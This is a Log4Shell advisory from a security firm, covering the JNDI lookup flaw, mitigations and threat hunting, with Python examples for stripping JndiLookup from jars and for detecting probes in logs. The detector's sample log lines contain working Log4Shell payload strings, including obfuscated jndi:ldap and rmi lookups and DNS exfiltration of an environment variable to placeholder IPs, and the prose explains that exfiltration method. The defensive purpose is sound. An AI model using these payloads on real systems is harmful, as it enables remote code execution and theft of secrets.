Apache Log4j is an open-source Java logging framework used in a very large number of Java applications. On December 9, 2021, a critical vulnerability in Log4j 2 was publicly disclosed. Known as Log4Shell and tracked as CVE-2021-44228 (its Common Vulnerabilities and Exposures identifier), it is a zero-day arbitrary code execution vulnerability.
The vulnerability stems from Log4j 2's message lookup feature, which interprets ${...} patterns in logged strings. A ${jndi:...} pattern triggers a JNDI (Java Naming and Directory Interface) lookup, typically over LDAP (Lightweight Directory Access Protocol), against whatever server is named in the string. Because the string is not validated and the server can be attacker-controlled, anything an attacker can get logged (a User-Agent header, a username, a search term) can make the application fetch and execute arbitrary Java code. Tenable has described this CVE as “the single biggest, most critical vulnerability of the last decade“. Log4Shell has a CVSS rating of 10, the highest available score.
Adarma's customer-facing and service delivery, threat advisory and IT/security teams are actively working with customers on the wide range of issues and remediation work this vulnerability requires. We deem it critical because of the range of systems that are potentially exploitable. In particular, systems whose internet-facing components do not appear vulnerable can still be exploited if user-supplied data is passed on to downstream components that log it with the Log4j library.
We are observing active exploitation of this vulnerability. Although most of the attacks seen so far have needed customisation to get past existing protective security controls, malicious actors can adapt their payloads very rapidly to achieve system and network compromise.
Figure 1: GovCERT.ch (https://govcert.ch/blog/zero-day-exploit-targeting-popular-java-library-log4j/)
Recommendations:
– Installations of Log4J v2 should be updated to the latest non-vulnerable version (v2.16.0 at the time of writing).
– Disable all outbound LDAP from servers explicitly via local filter, firewall, proxy, and screening router. Ensure outbound traffic is via proxy.
– Implement blocking rules on Web Application Firewalls as a stopgap; expect obfuscated lookup strings to bypass simple signature matches
– If you cannot update and are running 2.10 or later, disable message lookups by setting the system property log4j2.formatMsgNoLookups=true (or the environment variable LOG4J_FORMAT_MSG_NO_LOOKUPS=true); on any 2.x version, remove the JndiLookup class (org/apache/logging/log4j/core/lookup/JndiLookup.class) from the classpath. Removing the class is the more robust of the two, as the lookup-disabling flag does not cover every configuration
– Do not re-enable the lookup functionality
– Initiate threat hunts to look for possible attempts to exploit this vulnerability
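A small check for the update-or-mitigate items above, added here as an example and not code from the original post or from the Log4j project: it reads the Implementation-Version from a log4j-core jar's manifest, reports whether JndiLookup.class is still present, and rewrites the jar without that class (the same effect as `zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class`). The jars that `demo()` inspects are constructed stand-ins (a manifest plus a placeholder class entry), not real Log4j builds, and `FIXED_VERSION` is set to the 2.16.0 named on this page.

```python
"""Added example: check a log4j-core jar for its version and the JndiLookup class,
and strip the class from a copy when upgrading is not immediately possible."""
import re
import tempfile
import zipfile
from pathlib import Path

JNDI_CLASS = "org/apache/logging/log4j/core/lookup/JndiLookup.class"
FIXED_VERSION = (2, 16, 0)  # the "latest non-vulnerable" release named on this page


def parse_version(text):
    """'2.14.1' -> (2, 14, 1); returns None for anything unparseable."""
    m = re.match(r"\s*(\d+)\.(\d+)\.(\d+)", text)
    return tuple(int(x) for x in m.groups()) if m else None


def inspect_jar(path):
    """Report the manifest Implementation-Version and whether JndiLookup.class is present."""
    with zipfile.ZipFile(path) as zf:
        names = set(zf.namelist())
        version = None
        if "META-INF/MANIFEST.MF" in names:
            manifest = zf.read("META-INF/MANIFEST.MF").decode("utf-8", "replace")
            for line in manifest.splitlines():
                if line.startswith("Implementation-Version:"):
                    version = parse_version(line.split(":", 1)[1])
    has_jndi = JNDI_CLASS in names
    # Unknown version with the class present is treated as needing action (conservative).
    needs_action = has_jndi and (version is None or version < FIXED_VERSION)
    return {"version": version, "has_jndi_lookup": has_jndi, "needs_action": needs_action}


def strip_jndi_lookup(src, dst):
    """Copy src to dst, omitting JndiLookup.class; compression settings of each entry are kept."""
    with zipfile.ZipFile(src) as zin, zipfile.ZipFile(dst, "w") as zout:
        for info in zin.infolist():
            if info.filename == JNDI_CLASS:
                continue
            zout.writestr(info, zin.read(info.filename))


def build_sample_jar(path, version, include_jndi_class):
    """Constructed stand-in for a log4j-core jar: a manifest plus a placeholder class entry."""
    with zipfile.ZipFile(path, "w") as zf:
        zf.writestr("META-INF/MANIFEST.MF",
                    f"Manifest-Version: 1.0\r\nImplementation-Version: {version}\r\n")
        if include_jndi_class:
            # Only the class-file magic bytes; this is not real bytecode.
            zf.writestr(JNDI_CLASS, b"\xca\xfe\xba\xbe")


def demo():
    """Inspect a constructed 2.14.1 jar, strip the class, re-inspect, and check a 2.16.0 jar."""
    with tempfile.TemporaryDirectory() as tmp:
        old = Path(tmp) / "log4j-core-2.14.1.jar"
        stripped = Path(tmp) / "log4j-core-2.14.1-nojndi.jar"
        new = Path(tmp) / "log4j-core-2.16.0.jar"
        build_sample_jar(old, "2.14.1", True)
        # 2.16.0 still ships the class but disables JNDI by default, so version decides.
        build_sample_jar(new, "2.16.0", True)
        before = inspect_jar(old)
        strip_jndi_lookup(old, stripped)
        after = inspect_jar(stripped)
        patched = inspect_jar(new)
    return before, after, patched


if __name__ == "__main__":
    for label, result in zip(("before", "after strip", "2.16.0"), demo()):
        print(f"{label:12} {result}")
```

Run `inspect_jar(path)` against the real jars on a host. Log4j is frequently bundled inside WAR and EAR archives and shaded fat jars, so those need to be opened and scanned as well, and a stripped jar only takes effect once it has been redeployed and the application restarted.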
Threat hunting is an essential component of any defence strategy. We recommend building advanced detection capabilities to proactively search for threats that have bypassed preventative controls and are evading detection.
Threat hunting means actively investigating for unusual or anomalous behaviour that indicates malicious activity or intent, rather than waiting for an alert. For Log4Shell that means reviewing web server, proxy and DNS logs for lookup strings, and for unexpected outbound LDAP or DNS requests from application servers.
Updated
Installations of Log4j v2 should be updated to the latest non-vulnerable version, 2.16.0. The previously released version (v2.15.0), which mitigates the remote code execution vulnerability, was still vulnerable to a denial of service attack (tracked as CVE-2021-45046).
Fully weaponised and automated attacks are now being seen in the wild. Many of them use DNS to exfiltrate sensitive information, such as environment variables, rather than attempting to download and execute remote code: a nested lookup such as ${env:VARIABLE_NAME} inside the JNDI URL is resolved first, the value becomes a label in the hostname the server then resolves, and so the data leaves through the organisation's own DNS resolvers even where outbound LDAP is blocked.
Adarma reiterates its recommendation that organisations ensure all outbound traffic is directed via filtering proxy and DNS servers, with strict allowlists implemented on those servers.
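As an added example for the threat-hunting recommendation and the DNS exfiltration pattern described above (not code from the original post), the following Python normalises the obfuscations seen in the wild (URL encoding, ${lower:...} and ${upper:...} wrappers, and the ${x:-default} trick) before matching, so that a signature on the literal string ${jndi: is not enough to evade it. It also flags lookups such as ${env:...} nested inside the JNDI URL, which is how environment variables end up in DNS queries. The log lines and the environment variable name are constructed for the example, and the IP addresses are documentation ranges.

```python
"""Added example: find Log4Shell probes in access-log lines, including obfuscated and
URL-encoded lookup strings, and flag nested lookups used for data exfiltration."""
import re
from urllib.parse import unquote

# An innermost ${...} with no further lookup nested inside it.
INNERMOST = re.compile(r"\$\{([^${}]*)\}")
# jndi: followed by a protocol handler that has been abused in the wild.
JNDI = re.compile(r"jndi\s*:\s*(ldaps?|rmi|dns|iiop|corba|nds|https?)\b", re.I)
# Lookups that read local data; nested in a JNDI URL they leak that data to the attacker's server.
EXFIL = re.compile(r"\$\{(env|sys|java|ctx|log4j|main|bundle|hostName)(?=[:}])", re.I)


def _reduce(m):
    """Resolve one innermost lookup the way Log4j would, for the common obfuscation forms."""
    body = m.group(1)
    if body.lower().startswith("lower:"):
        return body[6:].lower()
    if body.lower().startswith("upper:"):
        return body[6:].upper()
    if ":-" in body:                      # ${anything:-default} evaluates to default
        return body.rpartition(":-")[2]
    return m.group(0)                     # leave jndi:, env:, sys: etc. in place


def normalize(text):
    """Undo (possibly repeated) URL encoding, then collapse nested lookups from the inside out."""
    for _ in range(3):
        decoded = unquote(text)
        if decoded == text:
            break
        text = decoded
    for _ in range(20):                   # bounded: each pass removes at least one layer
        reduced = INNERMOST.sub(_reduce, text)
        if reduced == text:
            break
        text = reduced
    return text


def analyze(line):
    """Return a finding for a line carrying a JNDI lookup after normalisation, else None."""
    norm = normalize(line)
    m = JNDI.search(norm)
    if not m:
        return None
    return {
        "scheme": m.group(1).lower(),
        "exfil_lookups": sorted({e.lower() for e in EXFIL.findall(norm)}),
        "normalized": norm,
    }


def hunt(lines):
    """Run analyze() over a log and keep the flagged lines together with their index."""
    findings = []
    for i, line in enumerate(lines):
        f = analyze(line)
        if f:
            f["index"] = i
            findings.append(f)
    return findings


# Constructed sample access-log lines (documentation IP ranges, not real traffic).
SAMPLE_LOGS = [
    '10.0.0.5 - - [10/Dec/2021:03:12:44 +0000] "GET / HTTP/1.1" 200 612 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [10/Dec/2021:03:13:01 +0000] "GET /login HTTP/1.1" 404 0 "-" '
    '"${jndi:ldap://203.0.113.7:1389/a}"',
    '198.51.100.9 - - [10/Dec/2021:03:13:05 +0000] "GET / HTTP/1.1" 200 612 "-" '
    '"${${lower:j}ndi:${lower:l}dap://198.51.100.9/x}"',
    '198.51.100.9 - - [10/Dec/2021:03:13:09 +0000] "GET / HTTP/1.1" 200 612 "-" '
    '"${${::-j}${::-n}${::-d}${::-i}:rmi://198.51.100.9:1099/obj}"',
    '198.51.100.9 - - [10/Dec/2021:03:13:12 +0000] "GET /?q=%24%7Bjndi%3Adns%3A%2F%2F'
    '%24%7Benv%3AAWS_SECRET_ACCESS_KEY%7D.198.51.100.9%7D HTTP/1.1" 200 612 "-" "-"',
    '198.51.100.9 - - [10/Dec/2021:03:13:15 +0000] "GET / HTTP/1.1" 200 612 "-" '
    '"${jndi:ldap://${env:AWS_SECRET_ACCESS_KEY}.198.51.100.9/a}"',
]

if __name__ == "__main__":
    for f in hunt(SAMPLE_LOGS):
        print(f"line {f['index']}: jndi:{f['scheme']} exfil={f['exfil_lookups'] or '-'}  {f['normalized']}")
```

Feed it every field an application might log, not just the User-Agent: request paths, query strings, headers such as X-Forwarded-For, and form values all reach Log4j in real deployments. A hit on a line with a non-empty exfil_lookups list means the corresponding secrets should be treated as exposed and rotated.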
Why Adarma?
We promise to stand by the side of our customers every day; providing trusted and transparent security solutions that protect against threats, mitigate risk, and deliver the business outcomes you need to make a remarkable difference.
Working together with you and your team, we provide advice, intelligence, technology and managed security services with complete visibility and transparency to ensure you are fully protected as you transform, innovate, and grow.
We were founded, and are still run, by security industry leaders, so we understand the challenges faced by businesses and security professionals alike. As one of the UK’s largest independent security services providers, we have an extensive and discerning view of the current threats.
Our industry award-winning services and solutions support a wide range of organisations to create a security strategy that’s tailored to their unique needs. Our portfolio includes:
– Advisory and Assessment Services to help you identify how and what to improve
– Security Technology and Engineering to help you build the best security relevant to your risk profile
– Managed Threat and Incident Response that ensures you have control to reduce risk
– Threat Intelligence Services to reveal and mitigate your vulnerabilities
Contact us now to find out how Adarma can help protect your business or speak to your Adarma representative for more information.
Stay up-to-date with the latest threat insights from Adarma by following us on Twitter and LinkedIn.